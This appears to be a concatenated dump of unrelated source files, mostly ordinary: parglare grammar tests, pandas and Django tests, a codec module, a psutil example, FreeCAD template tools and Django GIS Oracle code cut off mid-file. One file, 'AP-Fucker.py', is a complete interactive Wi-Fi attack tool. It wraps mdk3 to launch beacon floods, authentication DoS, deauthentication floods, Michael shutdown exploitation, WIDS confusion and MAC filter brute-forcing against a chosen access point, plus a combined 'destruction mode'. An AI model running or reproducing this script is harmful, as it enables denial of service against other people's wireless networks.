_COURSES = []
# pylint: disable=unused-argument
def get_course_enrollments(student_id):
"""Stubbed out Enrollment data request."""
return _ENROLLMENTS
def get_course_enrollment(student_id, course_id):
"""Stubbed out Enrollment data request."""
return _get_fake_enrollment(student_id, course_id)
def create_course_enrollment(student_id, course_id, mode='honor', is_active=True):
"""Stubbed out Enrollment creation request. """
return add_enrollment(student_id, course_id, mode=mode, is_active=is_active)
def update_course_enrollment(student_id, course_id, mode=None, is_active=None):
"""Stubbed out Enrollment data request."""
enrollment = _get_fake_enrollment(student_id, course_id)
if enrollment and mode is not None:
enrollment['mode'] = mode
if enrollment and is_active is not None:
enrollment['is_active'] = is_active
return enrollment
def get_course_enrollment_info(course_id):
"""Stubbed out Enrollment data request."""
return _get_fake_course_info(course_id)
def _get_fake_enrollment(student_id, course_id):
"""Get an enrollment from the enrollments array."""
for enrollment in _ENROLLMENTS:
if student_id == enrollment['student'] and course_id == enrollment['course']['course_id']:
return enrollment
def _get_fake_course_info(course_id):
"""Get a course from the courses array."""
for course in _COURSES:
if course_id == course['course_id']:
return course
def add_enrollment(student_id, course_id, is_active=True, mode='honor'):
"""Append an enrollment to the enrollments array."""
enrollment = {
"created": datetime.datetime.now(),
"mode": mode,
"is_active": is_active,
"course": _get_fake_course_info(course_id),
"student": student_id
}
_ENROLLMENTS.append(enrollment)
return enrollment
def add_course(course_id, enrollment_start=None, enrollment_end=None, invite_only=False, course_modes=None):
"""Append course to the courses array."""
course_info = {
"course_id": course_id,
"enrollment_end": enrollment_end,
"course_modes": [],
"enrollment_start": enrollment_start,
"invite_only": invite_only,
}
if not course_modes:
course_info['course_modes'].append(_DEFAULT_FAKE_MODE)
else:
for mode in course_modes:
new_mode = copy.deepcopy(_DEFAULT_FAKE_MODE)
new_mode['slug'] = mode
course_info['course_modes'].append(new_mode)
_COURSES.append(course_info)
def reset():
"""Set the enrollments and courses arrays to be empty."""
global _COURSES # pylint: disable=global-statement
_COURSES = []
global _ENROLLMENTS # pylint: disable=global-statement
_ENROLLMENTS = []
| agpl-3.0 |
PrinceShaji/StreamBox | TestCodes/examplecodes/AP-Fucker.py | 1 | 9270 |
#!/usr/bin/env python
# -*- coding: Utf-8 -*-
#
# WIRELESS ACCESS POINT FUCKER
# Interactive, Multifunction, Destruction Mode Included
#
# Thanks to BackTrack crew, especially ShamanVirtuel and ASPJ
#
# USAGE: Launch the script as root using "python AP-Fucker.py", follow instructions, enjoy!
# Prerequisites: Have mdk3 installed
#
__app__ = "AP-Fucker"
__version__ = "0.5"
__author__ = "MatToufoutu"
### IMPORTS
from sys import stdout
from sys import exit as sysexit
from os import system, remove, path
from commands import getoutput
from threading import Thread
from time import sleep, ctime
### MDK3 THREADED ATTACKS CLASS
class Mdk3(Thread):
def __init__(self, attack, attack_options):
Thread.__init__(self)
self.attack = attack
self.iface = attack_options[0]
self.essid = attack_options[1]
self.bssid = attack_options[2]
self.chan = attack_options[3]
self.log = "apfucker.log"
self.modes = {"B":self.bflood, "A":self.ados, "D":self.amok,
"M":self.mich, "W":self.wids, "C":self.brutmac}
def bflood(self):
out = open(self.log,"a")
out.write("\n ----- "+ctime()+" : Launching beacon flood against %s on channel %s -----" % (self.essid, self.chan))
out.close()
print("\n Launching beacon flood against %s on channel %s" % (self.essid, self.chan))
sleep(2)
system("mdk3 "+self.iface+" b -n "+self.essid+" -g -w -m -c "+self.chan+" >> "+self.log)
def ados(self):
out = open(self.log,"a")
out.write("\n ----- "+ctime()+" : Launching Auth DoS against %s -----" % (self.bssid))
out.close()
print("\n Launching Auth DoS against %s " % (self.bssid))
sleep(2)
system("mdk3 "+self.iface+" a -i "+self.bssid+" -m -s 1024 >> "+self.log)
def amok(self):
out = open(self.log,"a")
out.write("\n ----- "+ctime()+" : Launching Deauth Flood 'Amok' Mode on channel %s -----" % (self.chan))
out.close()
print("\n Launching Deauth Flood 'Amok' Mode on channel %s" % (self.chan))
sleep(2)
system("mdk3 "+self.iface+" d -c "+self.chan+" -s 1024 >> "+self.log)
def mich(self):
out = open(self.log,"a")
out.write("\n ----- "+ctime()+" : Launching Michael 'Shutdown' Exploitation against %s on channel %s -----" % (self.bssid, self.chan))
out.close()
print("\n Launching Michael 'Shutdown' Exploitation against %s on channel %s" % (self.bssid, self.chan))
sleep(2)
system("mdk3 "+self.iface+" m -t "+self.bssid+" -j -w 1 -n 1024 -s 1024 >> "+self.log)
def wids(self):
out = open(self.log,"a")
out.write("\n ----- "+ctime()+" : Launching WIDS Confusion against %s on channel %s -----" % (self.essid, self.chan))
out.close()
print("\n Launching WIDS Confusion against %s on channel %s" % (self.essid, self.chan))
sleep(2)
system("mdk3 "+self.iface+" w -e "+self.essid+" -c "+self.chan+" >> "+self.log)
def brutmac(self):
global runanim
runanim = True
out = open(self.log, "a")
out.write("\n ----- "+ctime()+" : Launching MAC filter Brute-Forcer against %s -----\n" % (self.bssid))
print("\n Launching MAC filter Brute-Forcer against %s" % (self.bssid))
sleep(2)
macfound = getoutput("mdk3 "+self.iface+" f -t "+self.bssid).splitlines()[-2:]
runanim = False
sleep(1)
print; print
for line in macfound:
print(line)
out.write("\n"+line)
out.close()
print
sysexit(0)
def run(self):
global runanim
runanim = True
self.modes[self.attack]()
runanim = False
### AUXILIARY FUNCTIONS
## CHECK IF IFACE IS IN MONITOR MODE
def check_mon(iface):
for line in getoutput("iwconfig "+iface).splitlines():
if "Mode:Monitor" in line:
return True
return False
## CHECK IF BSSID IS VALID
def check_mac(ap):
if len(ap) != 17 or ap.count(':') != 5:
return False
macchar = "0123456789abcdef:"
for c in ap.lower():
if macchar.find(c) == -1:
return False
return True
## CHECK IF CHANNEL IS VALID
def check_chan(iface, chan):
if chan.isdigit():
channel = int(chan)
if not channel in range(1, int(getoutput("iwlist "+iface+" channel | grep channels | awk '{print $2}'"))+1):
return False
else:
return False
return True
## CLEAN EXIT
def clean_exit():
print;print
print("\nAction aborted by user. Exiting now")
for pid in getoutput("ps aux | grep mdk3 | grep -v grep | awk '{print $2}'").splitlines():
system("kill -9 "+pid)
print("Hope you enjoyed it ;-)")
sleep(2)
system("clear")
sysexit(0)
## DUMMY WAITING MESSAGE (ANIMATED)
def waiter(mess):
try:
stdout.write("\r | "+mess)
stdout.flush()
sleep(0.15)
stdout.write("\r / "+mess)
stdout.flush()
sleep(0.15)
stdout.write("\r-- "+mess)
stdout.flush()
sleep(0.15)
stdout.write("\r \\ "+mess)
stdout.flush()
sleep(0.15)
stdout.write("\r | "+mess)
stdout.flush()
sleep(0.15)
stdout.write("\r / "+mess)
stdout.flush()
sleep(0.15)
stdout.write("\r-- "+mess)
stdout.flush()
sleep(0.15)
stdout.write("\r \\ "+mess)
stdout.flush()
sleep(0.15)
except KeyboardInterrupt:
clean_exit()
### MAIN APP
try:
import psyco
psyco.full()
except ImportError:
pass
attackAvail = ["B", "A", "W", "D", "M", "T", "E", "C"]
attack_opt = []
if getoutput("whoami") != "root":
print("This script must be run as root !")
sysexit(0)
try:
system("clear")
print("\n\t\t########## ACCESS POINT FUCKER ##########\n")
print("""Choose your Mode:
\t - (B)eacon flood
\t - (A)uth DoS
\t - (W)ids confusion
\t - (D)isassociation 'AmoK Mode'
\t - (M)ichael shutdown exploitation
\t - MA(C) Filter Brute-Forcer
\t - Des(T)ruction mode (USE WITH CAUTION)\n""")
## GET MODE
while 1:
mode = raw_input("\n>>> ")
if mode.upper() not in attackAvail:
print(" '%s' is not a valid mode !" % mode)
else:
break
## GET INTERFACE
while 1:
iface = raw_input("\nMonitor interface to use: ")
if check_mon(iface):
attack_opt.append(iface)
break
else:
print("%s is not a Monitor interface, try again or hit Ctrl+C to quit" % iface)
## GET ESSID
if mode.upper() == "B" or mode.upper() == "W" or mode.upper() == "T":
attack_opt.append("\""+raw_input("\nTarget ESSID: ")+"\"")
else:
attack_opt.append(None)
## GET BSSID
if mode.upper() == "A" or mode.upper() == "M" or mode.upper() == "T" or mode.upper() == "C":
while 1:
bssid = raw_input("\nTarget BSSID: ")
if check_mac(bssid):
attack_opt.append(bssid)
break
else:
print("Invalid BSSID, try again or hit Ctrl+C to quit")
else:
attack_opt.append(None)
## GET CHANNEL
if mode.upper() != "C":
while 1:
channel = raw_input("\nTarget channel: ")
if check_chan(iface, channel):
attack_opt.append(channel)
break
else:
print("Channel can only be 1 to 14, try again or hit Ctrl+C to quit")
else:
attack_opt.append(None)
## LAUNCH SELECTED ATTACK
if path.exists("apfucker.log"):
remove("apfucker.log")
if mode.upper() != "T":
system('clear')
Mdk3(mode.upper(), attack_opt).start()
sleep(1)
print; print; print
while runanim:
waiter(" ATTACK IS RUNNING !!! HIT CTRL+C TWICE TO STOP THE TASK...")
else:
system('clear')
print("\n\t/!\\/!\\/!\\ WARNING /!\\/!\\/!\\\n")
print(" You've choosen DESTRUCTION MODE")
print(" Using this mode may harm your WiFi card, use it at your own risks.")
validate = raw_input(" Do you wish to continue? (y/N): ")
if validate.upper() != "Y":
print(" Ok, exiting now")
sysexit(0)
else:
out = open("apfucker.log","a")
out.write("\n ----- "+ctime()+" : Launching Destruction Combo. Target is AP %s|%s on channel %s -----" % (attack_opt[1], attack_opt[2], attack_opt[3]))
out.close()
print("\n Launching Destruction Combo\n Target is AP %s|%s on channel %s" % (attack_opt[1], attack_opt[2], attack_opt[3]))
print(" Please be kind with your neighbours xD")
##wids not implemented: may raise segfault
##appears to be an internal mdk3 issue when running multiple attacks
for atk in ("B", "A", "D", "M"):
Mdk3(atk, attack_opt).start()
sleep(1)
print; print; print
while runanim:
waiter(" DESTRUCTION COMBO IS RUNNING !!! HIT CTRL+C TWICE TO STOP THE TASK...")
except KeyboardInterrupt:
clean_exit()
| mit |
igordejanovic/parglare | tests/func/grammar/test_grammar.py | 1 | 10211 | # -*- coding: utf-8 -*-
import pytest
from parglare import Parser, Grammar
from parglare.grammar import ASSOC_LEFT, ASSOC_RIGHT, DEFAULT_PRIORITY
from parglare.exceptions import GrammarError, ParseError
def test_single_terminal():
"""
Test that grammar may be just a single terminal.
"""
grammar = r"""
S: A;
terminals
A: "a";
"""
g = Grammar.from_string(grammar)
parser = Parser(g)
result = parser.parse('a')
assert result == 'a'
grammar = r"""
S: A;
terminals
A: /\d+/;
"""
g = Grammar.from_string(grammar)
parser = Parser(g)
result = parser.parse('23')
assert result == '23'
def test_undefined_grammar_symbol():
"Tests that undefined grammar symbols raises errors."
grammar = """
S: A B;
A: "a" | B;
B: id;
"""
with pytest.raises(GrammarError) as e:
Grammar.from_string(grammar)
assert 'Unknown symbol' in str(e.value)
assert 'id' in str(e.value)
def test_multiple_terminal_definition():
grammar = """
S: A A;
terminals
A: "a";
A: "b";
"""
with pytest.raises(GrammarError,
match=r'.*Multiple definitions of terminal rule.*'):
Grammar.from_string(grammar)
def test_reserved_symbol_names():
"""
Test that reserved symbol names can't be used.
"""
grammar = """
S: STOP "First";
STOP: "stop";
"""
with pytest.raises(GrammarError) as e:
Grammar.from_string(grammar)
assert 'is reserved' in str(e.value)
grammar = """
S: EMPTY "First";
EMPTY: "stop";
"""
with pytest.raises(GrammarError) as e:
Grammar.from_string(grammar)
assert 'is reserved' in str(e.value)
def test_assoc_prior():
"""Test that associativity and priority can be defined for productions and
terminals.
"""
grammar = r"""
E: E '+' E {left, 1};
E: E '*' E {2, left};
E: E '^' E {right};
E: id;
terminals
id: /\d+/;
"""
g = Grammar.from_string(grammar)
assert g.productions[1].prior == 1
assert g.productions[1].assoc == ASSOC_LEFT
assert g.productions[3].assoc == ASSOC_RIGHT
assert g.productions[3].prior == DEFAULT_PRIORITY
assert g.productions[3].prior == DEFAULT_PRIORITY
# Repeat the same but for alternative keywords "shift" and "reduce"
grammar = r"""
E: E '+' E {reduce, 1};
E: E '*' E {2, reduce};
E: E '^' E {shift};
E: id;
terminals
id: /\d+/;
"""
g = Grammar.from_string(grammar)
assert g.productions[1].prior == 1
assert g.productions[1].assoc == ASSOC_LEFT
assert g.productions[3].assoc == ASSOC_RIGHT
assert g.productions[3].prior == DEFAULT_PRIORITY
assert g.productions[3].prior == DEFAULT_PRIORITY
def test_terminal_priority():
"Terminals might define priority which is used for lexical disambiguation."
grammar = """
S: A | B;
A: 'a' {15};
B: 'b';
"""
g = Grammar.from_string(grammar)
for t in g.terminals.values():
if t.name == 'A':
assert t.prior == 15
else:
assert t.prior == DEFAULT_PRIORITY
def test_no_terminal_associavitity():
"Tests that terminals can't have associativity defined."
grammar = """
S: A | B;
terminals
A: 'a' {15, left};
B: 'b';
"""
with pytest.raises(ParseError) as e:
Grammar.from_string(grammar)
assert 'Expected: : but found <NotComment(};)> or <}(})>' \
in str(e.value)
def test_terminal_empty_body():
"""
Test that terminals may have empty bodies (when defined using
recognizers)
"""
grammar = """
S: A | B;
terminals
A: {15};
B: ;
"""
g = Grammar.from_string(grammar, recognizers={'B': None, 'A': None})
a = g.get_terminal('A')
assert a.prior == 15
b = g.get_terminal('B')
assert b.recognizer is None
def test_terminal_regexp_with_backslash():
"""Regexp terminals can contain (escaped) backslash."""
grammar = Grammar.from_string(r"""
start: t1 t2;
terminals
t1: /\\/;
t2: /a/;
""")
t1 = grammar.get_terminal('t1')
assert t1.recognizer._regex == '\\\\'
assert t1.recognizer('\\', 0) == '\\'
def test_builtin_grammar_action():
"""
Builtin actions can be referenced from a grammar.
"""
grammar = """
@collect
Ones: Ones One | One;
terminals
One: "1";
"""
g = Grammar.from_string(grammar)
ones = g.get_nonterminal('Ones')
from parglare.actions import collect
assert ones.action == collect
p = Parser(g)
result = p.parse('1 1 1 1 1')
assert result == "1 1 1 1 1".split()
def test_multiple_grammar_action_raises_error():
"""
If multiple actions are given for the same non-terminal GrammarError
should be raised.
"""
grammar = """
S: Ones;
@collect
Ones: Ones One | One;
@something
Ones: 'foo';
terminals
One: "1";
"""
# Actions 'collect' and 'something' defined for rule 'Ones'
with pytest.raises(GrammarError) as e:
Grammar.from_string(grammar)
assert 'Multiple' in str(e.value)
def test_action_override():
"""
Explicitely provided action in `actions` param overrides default or
grammar provided.
"""
grammar = """
S: Foo Bar;
@pass_nochange
Bar: "1" a;
terminals
@pass_nochange
Foo: 'foo';
a: "a";
"""
g = Grammar.from_string(grammar)
p = Parser(g)
input_str = "foo 1 a"
result = p.parse(input_str)
assert result == ["foo", ["1", "a"]]
actions = {
"Foo": lambda _, __: "eggs",
"Bar": lambda _, __: "bar reduce"}
p = Parser(g, actions=actions)
result = p.parse(input_str)
assert result == ["eggs", "bar reduce"]
# Test with actions call postponing
p = Parser(g, build_tree=True, actions=actions)
tree = p.parse(input_str)
result = p.call_actions(tree)
assert result == ["eggs", "bar reduce"]
def assignment_in_productions(prods, symbol_name, assgn_name):
found = False
for p in prods:
if p.symbol.name == symbol_name:
found = assgn_name in p.assignments
return found
def test_assignment_plain():
"""
Test plain assignment.
"""
grammar = """
S: "1" first=some_match "3";
terminals
some_match: "2";
"""
g = Grammar.from_string(grammar)
assert assignment_in_productions(g.productions, 'S', 'first')
called = [False]
def act_s(_, nodes, first):
called[0] = True
assert first == "2"
return nodes
actions = {
"S": act_s
}
p = Parser(g, actions=actions)
input_str = '1 2 3'
result = p.parse(input_str)
assert result == ["1", "2", "3"]
assert called[0]
def test_assignment_bool():
"""
Test bool assignment.
"""
grammar = """
S: "1" first?=some_match "3";
terminals
some_match: "2";
"""
g = Grammar.from_string(grammar)
assert assignment_in_productions(g.productions, 'S', 'first')
called = [False]
def act_s(_, nodes, first):
called[0] = True
assert first is True
return nodes
actions = {
"S": act_s
}
p = Parser(g, actions=actions)
input_str = '1 2 3'
result = p.parse(input_str)
assert result == ["1", "2", "3"]
assert called[0]
def test_assignment_of_repetition():
"""
Test assignment of repetition.
"""
grammar = """
S: "1" first=some_match+ "3";
terminals
some_match: "2";
"""
g = Grammar.from_string(grammar)
assert assignment_in_productions(g.productions, 'S', 'first')
called = [False]
def act_s(_, nodes, first):
called[0] = True
assert first == ["2", "2"]
return nodes
actions = {
"S": act_s
}
p = Parser(g, actions=actions)
input_str = '1 2 2 3'
result = p.parse(input_str)
assert result == ["1", ["2", "2"], "3"]
assert called[0]
def test_assignment_of_repetition_with_sep():
"""
Test assignment of repetition.
"""
grammar = """
S: "1" first=some_match+[comma] "3";
terminals
some_match: "2";
comma: ",";
"""
g = Grammar.from_string(grammar)
assert assignment_in_productions(g.productions, 'S', 'first')
called = [False]
def act_s(_, nodes, first):
called[0] = True
assert first == ["2", "2"]
return nodes
actions = {
"S": act_s
}
p = Parser(g, actions=actions)
input_str = '1 2, 2 3'
result = p.parse(input_str)
assert result == ["1", ["2", "2"], "3"]
assert called[0]
def test_multiple_assignment_with_repetitions():
"""
Test assignment of repetition.
"""
grammar = """
S: "1" first=some_match+[comma] second?=some_match* "3";
terminals
some_match: "2";
comma: ",";
"""
g = Grammar.from_string(grammar)
assert assignment_in_productions(g.productions, 'S', 'first')
assert assignment_in_productions(g.productions, 'S', 'second')
called = [False]
def act_s(_, nodes, first, second):
called[0] = True
assert first == ["2", "2"]
assert second is True
return nodes
actions = {
"S": act_s
}
p = Parser(g, actions=actions)
input_str = '1 2, 2 2 2 2 3'
result = p.parse(input_str)
assert result == ["1", ["2", "2"], ["2", "2", "2"], "3"]
assert called[0]
def test_case_insensitive_parsing():
"""
By default parglare is case sensitive. This test parsing without case
sensitivity.
"""
grammar = r"""
S: "one" "Two" Astart;
terminals
Astart: /Aa\w+/;
"""
g = Grammar.from_string(grammar)
# By default parsing is case sensitive for both string and regex matches.
parser = Parser(g)
with pytest.raises(ParseError):
parser.parse('One Two Aaa')
with pytest.raises(ParseError):
parser.parse('one Two AAa')
g = Grammar.from_string(grammar, ignore_case=True)
parser = Parser(g)
parser.parse('One Two Aaa')
parser.parse('one Two AAa')
| mit |
keyurpatel076/MissionPlannerGit | packages/IronPython.StdLib.2.7.4/content/Lib/encodings/utf_16_be.py | 860 | 1037 | """ Python 'utf-16-be' Codec
Written by Marc-Andre Lemburg ([email protected]).
(c) Copyright CNRI, All Rights Reserved. NO WARRANTY.
"""
import codecs
### Codec APIs
encode = codecs.utf_16_be_encode
def decode(input, errors='strict'):
return codecs.utf_16_be_decode(input, errors, True)
class IncrementalEncoder(codecs.IncrementalEncoder):
def encode(self, input, final=False):
return codecs.utf_16_be_encode(input, self.errors)[0]
class IncrementalDecoder(codecs.BufferedIncrementalDecoder):
_buffer_decode = codecs.utf_16_be_decode
class StreamWriter(codecs.StreamWriter):
encode = codecs.utf_16_be_encode
class StreamReader(codecs.StreamReader):
decode = codecs.utf_16_be_decode
### encodings module API
def getregentry():
return codecs.CodecInfo(
name='utf-16-be',
encode=encode,
decode=decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
| gpl-3.0 |
DGrady/pandas | pandas/tests/computation/test_compat.py | 11 | 1308 | import pytest
from distutils.version import LooseVersion
import pandas as pd
from pandas.core.computation.engines import _engines
import pandas.core.computation.expr as expr
from pandas.core.computation import _MIN_NUMEXPR_VERSION
def test_compat():
# test we have compat with our version of nu
from pandas.core.computation import _NUMEXPR_INSTALLED
try:
import numexpr as ne
ver = ne.__version__
if ver < LooseVersion(_MIN_NUMEXPR_VERSION):
assert not _NUMEXPR_INSTALLED
else:
assert _NUMEXPR_INSTALLED
except ImportError:
pytest.skip("not testing numexpr version compat")
@pytest.mark.parametrize('engine', _engines)
@pytest.mark.parametrize('parser', expr._parsers)
def test_invalid_numexpr_version(engine, parser):
def testit():
a, b = 1, 2 # noqa
res = pd.eval('a + b', engine=engine, parser=parser)
assert res == 3
if engine == 'numexpr':
try:
import numexpr as ne
except ImportError:
pytest.skip("no numexpr")
else:
if ne.__version__ < LooseVersion(_MIN_NUMEXPR_VERSION):
with pytest.raises(ImportError):
testit()
else:
testit()
else:
testit()
| bsd-3-clause |
lunixbochs/fs-uae-gles | launcher/fs_uae_launcher/fsui/wx/choice.py | 1 | 1037 | from __future__ import division
from __future__ import print_function
from __future__ import absolute_import
import wx
from .common import update_class
class Choice(wx.Choice):
def __init__(self, parent, items=[]):
wx.Choice.__init__(self, parent.get_container(), -1,
wx.DefaultPosition, wx.DefaultSize, items)
if len(items) > 0:
self.SetSelection(0)
self.Bind(wx.EVT_CHOICE, self.__choice_event)
def get_min_width(self):
return self.GetBestSize()[0]
def get_min_height(self):
return self.GetBestSize()[1]
def set_position(self, position):
self.SetPosition(position)
def set_size(self, size):
self.SetSize(size)
def get_index(self):
return self.GetSelection()
def set_index(self, index):
self.SetSelection(index)
def on_change(self):
print("Choice.on_change")
def __choice_event(self, event):
self.on_change()
update_class(Choice)
| gpl-2.0 |
YuanYouYuan/FreeCAD | src/Tools/MakeAppTools.py | 32 | 2611 | import os, sys, re,string,FCFileTools
verbose = 0
dcount = fcount = 0
def replaceTemplate(dirName, oldName, newName):
"""
modify contents from dirName and below, replace oldName by newName
"""
for file in os.listdir(dirName):
pathName = os.path.join(dirName, file)
if not os.path.isdir(pathName):
try:
print pathName
origFile = open(pathName) # open file
lines = origFile.readlines() # read the file...
origFile.close() # ... and close it
output = open(pathName,"w") # open the file again
for line in lines:
if (string.find(line, oldName) != -1): # search for 'oldName' and replace it
line = string.replace(line, oldName, newName)
output.write(line) # write the modified line back
output.close # close the file
except:
print 'Error modifying', pathName, '--skipped'
print sys.exc_type, sys.exc_value
else:
try:
replaceTemplate(pathName, oldName, newName)
except:
print 'Error changing to directory', pathName, '--skipped'
print sys.exc_type, sys.exc_value
def copyTemplate(dirFrom, dirTo, oldName, newName, MatchFile, MatchDir):
"""
copy contents of dirFrom and below to dirTo
"""
global dcount, fcount
for file in os.listdir(dirFrom): # for files/dirs here
print file
pathFrom = os.path.join(dirFrom, file)
pathTo = os.path.join(dirTo, file) # extend both paths
if (string.find(pathTo, oldName) != -1):
pathTo = string.replace(pathTo, oldName, newName) # rename file if 'oldName' is found
if not os.path.isdir(pathFrom): # copy simple files
hit = 0
for matchpat in MatchFile:
if(re.match(matchpat,file)):
hit = 1
break
if hit:
print 'Ignore file '+file
continue
try:
if verbose > 1: print 'copying', pathFrom, 'to', pathTo
FCFileTools.cpfile(pathFrom, pathTo)
fcount = fcount+1
except:
print 'Error copying', pathFrom, 'to', pathTo, '--skipped'
print sys.exc_type, sys.exc_value
else:
hit = 0
for matchpat in MatchDir:
if(re.match(matchpat,file)):
hit = 1
break
if hit:
print 'Ignore directory '+file
continue
if verbose: print 'copying dir', pathFrom, 'to', pathTo
try:
os.mkdir(pathTo) # make new subdir
copyTemplate(pathFrom, pathTo, oldName, newName, MatchFile, MatchDir) # recur into subdirs
dcount = dcount+1
except:
print 'Error creating', pathTo, '--skipped'
print sys.exc_type, sys.exc_value
| lgpl-2.1 |
synasius/django | tests/null_queries/tests.py | 36 | 2939 | from __future__ import unicode_literals
from django.core.exceptions import FieldError
from django.test import TestCase
from .models import Choice, Inner, OuterA, OuterB, Poll
class NullQueriesTests(TestCase):
def test_none_as_null(self):
"""
Regression test for the use of None as a query value.
None is interpreted as an SQL NULL, but only in __exact and __iexact
queries.
Set up some initial polls and choices
"""
p1 = Poll(question='Why?')
p1.save()
c1 = Choice(poll=p1, choice='Because.')
c1.save()
c2 = Choice(poll=p1, choice='Why Not?')
c2.save()
# Exact query with value None returns nothing ("is NULL" in sql,
# but every 'id' field has a value).
self.assertQuerysetEqual(Choice.objects.filter(choice__exact=None), [])
# The same behavior for iexact query.
self.assertQuerysetEqual(Choice.objects.filter(choice__iexact=None), [])
# Excluding the previous result returns everything.
self.assertQuerysetEqual(
Choice.objects.exclude(choice=None).order_by('id'),
[
'<Choice: Choice: Because. in poll Q: Why? >',
'<Choice: Choice: Why Not? in poll Q: Why? >'
]
)
# Valid query, but fails because foo isn't a keyword
self.assertRaises(FieldError, Choice.objects.filter, foo__exact=None)
# Can't use None on anything other than __exact and __iexact
self.assertRaises(ValueError, Choice.objects.filter, id__gt=None)
# Related managers use __exact=None implicitly if the object hasn't been saved.
p2 = Poll(question="How?")
self.assertEqual(repr(p2.choice_set.all()), '<QuerySet []>')
def test_reverse_relations(self):
"""
Querying across reverse relations and then another relation should
insert outer joins correctly so as not to exclude results.
"""
obj = OuterA.objects.create()
self.assertQuerysetEqual(
OuterA.objects.filter(inner__third=None),
['<OuterA: OuterA object>']
)
self.assertQuerysetEqual(
OuterA.objects.filter(inner__third__data=None),
['<OuterA: OuterA object>']
)
Inner.objects.create(first=obj)
self.assertQuerysetEqual(
Inner.objects.filter(first__inner__third=None),
['<Inner: Inner object>']
)
# Ticket #13815: check if <reverse>_isnull=False does not produce
# faulty empty lists
OuterB.objects.create(data="reverse")
self.assertQuerysetEqual(
OuterB.objects.filter(inner__isnull=False),
[]
)
Inner.objects.create(first=obj)
self.assertQuerysetEqual(
OuterB.objects.exclude(inner__isnull=False),
['<OuterB: OuterB object>']
)
| bsd-3-clause |
chen0031/Dato-Core | src/unity/python_deps/psutil/examples/pmap.py | 43 | 1983 | #!/usr/bin/env python
# Copyright (c) 2009, Giampaolo Rodola'. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
A clone of 'pmap' utility on Linux, 'vmmap' on OSX and 'procstat -v' on BSD.
Report memory map of a process.
$ python examples/pmap.py 32402
pid=32402, name=hg
Address RSS Mode Mapping
0000000000400000 1200K r-xp /usr/bin/python2.7
0000000000838000 4K r--p /usr/bin/python2.7
0000000000839000 304K rw-p /usr/bin/python2.7
00000000008ae000 68K rw-p [anon]
000000000275e000 5396K rw-p [heap]
00002b29bb1e0000 124K r-xp /lib/x86_64-linux-gnu/ld-2.17.so
00002b29bb203000 8K rw-p [anon]
00002b29bb220000 528K rw-p [anon]
00002b29bb2d8000 768K rw-p [anon]
00002b29bb402000 4K r--p /lib/x86_64-linux-gnu/ld-2.17.so
00002b29bb403000 8K rw-p /lib/x86_64-linux-gnu/ld-2.17.so
00002b29bb405000 60K r-xp /lib/x86_64-linux-gnu/libpthread-2.17.so
00002b29bb41d000 0K ---p /lib/x86_64-linux-gnu/libpthread-2.17.so
00007fff94be6000 48K rw-p [stack]
00007fff94dd1000 4K r-xp [vdso]
ffffffffff600000 0K r-xp [vsyscall]
...
"""
import sys
import psutil
from psutil._compat import print_
def main():
if len(sys.argv) != 2:
sys.exit('usage: pmap <pid>')
p = psutil.Process(int(sys.argv[1]))
print_("pid=%s, name=%s" % (p.pid, p.name()))
templ = "%-16s %10s %-7s %s"
print_(templ % ("Address", "RSS", "Mode", "Mapping"))
total_rss = 0
for m in p.memory_maps(grouped=False):
total_rss += m.rss
print_(templ % (
m.addr.split('-')[0].zfill(16),
str(m.rss / 1024) + 'K',
m.perms,
m.path))
print_("-" * 33)
print_(templ % ("Total", str(total_rss / 1024) + 'K', '', ''))
if __name__ == '__main__':
main()
| agpl-3.0 |
wuga214/Django-Wuga | env/lib/python2.7/site-packages/django/contrib/gis/db/backends/oracle/operations.py | 18 | 10848 | """
This module contains the spatial lookup types, and the `get_geo_where_clause`
routine for Oracle Spatial.
Please note that WKT support is broken on the XE version, and thus
this backend will not work on such platforms. Specifically, XE lacks
support for an internal JVM, and Java libraries are required to use
the WKT constructors.
"""
import re
from django.contrib.gis.db.backends.base.operations import \
BaseSpatialOperations
from django.contrib.gis.db.backends.oracle.adapter import OracleSpatialAdapter
from django.contrib.gis.db.backends.utils import SpatialOperator
from django.contrib.gis.db.models import aggregates
from django.contrib.gis.geometry.backend import Geometry
from django.contrib.gis.measure import Distance
from django.db.backends.oracle.operations import DatabaseOperations
from django.utils import six
from django.utils.functional import cached_property
DEFAULT_TOLERANCE = '0.05'
class SDOOperator(SpatialOperator):
sql_template = "%(func)s(%(lhs)s, %(rhs)s) = 'TRUE'"
class SDODistance(SpatialOperator):
sql_template = "SDO_GEOM.SDO_DISTANCE(%%(lhs)s, %%(rhs)s, %s) %%(op)s %%(value)s" % DEFAULT_TOLERANCE
class SDODWithin(SpatialOperator):
sql_template = "SDO_WITHIN_DISTANCE(%(lhs)s, %(rhs)s, %%s) = 'TRUE'"
class SDODisjoint(SpatialOperator):
sql_template = "SDO_GEOM.RELATE(%%(lhs)s, 'DISJOINT', %%(rhs)s, %s) = 'DISJOINT'" % DEFAULT_TOLERANCE
class SDORelate(SpatialOperator):
sql_template = "SDO_RELATE(%(lhs)s, %(rhs)s, 'mask=%(mask)s') = 'TRUE'"
def check_relate_argument(self, arg):
masks = 'TOUCH|OVERLAPBDYDISJOINT|OVERLAPBDYINTERSECT|EQUAL|INSIDE|COVEREDBY|CONTAINS|COVERS|ANYINTERACT|ON'
mask_regex = re.compile(r'^(%s)(\+(%s))*$' % (masks, masks), re.I)
if not isinstance(arg, six.string_types) or not mask_regex.match(arg):
raise ValueError('Invalid SDO_RELATE mask: "%s"' % arg)
def as_sql(self, connection, lookup, template_params, sql_params):
template_params['mask'] = sql_params.pop()
return super(SDORelate, self).as_sql(connection, lookup, template_params, sql_params)
class SDOIsValid(SpatialOperator):
sql_template = "%%(func)s(%%(lhs)s, %s) = 'TRUE'" % DEFAULT_TOLERANCE
class OracleOperations(BaseSpatialOperations, DatabaseOperations):
name = 'oracle'
oracle = True
disallowed_aggregates = (aggregates.Collect, aggregates.Extent3D, aggregates.MakeLine)
Adapter = OracleSpatialAdapter
area = 'SDO_GEOM.SDO_AREA'
gml = 'SDO_UTIL.TO_GMLGEOMETRY'
centroid = 'SDO_GEOM.SDO_CENTROID'
difference = 'SDO_GEOM.SDO_DIFFERENCE'
distance = 'SDO_GEOM.SDO_DISTANCE'
extent = 'SDO_AGGR_MBR'
intersection = 'SDO_GEOM.SDO_INTERSECTION'
length = 'SDO_GEOM.SDO_LENGTH'
num_points = 'SDO_UTIL.GETNUMVERTICES'
perimeter = length
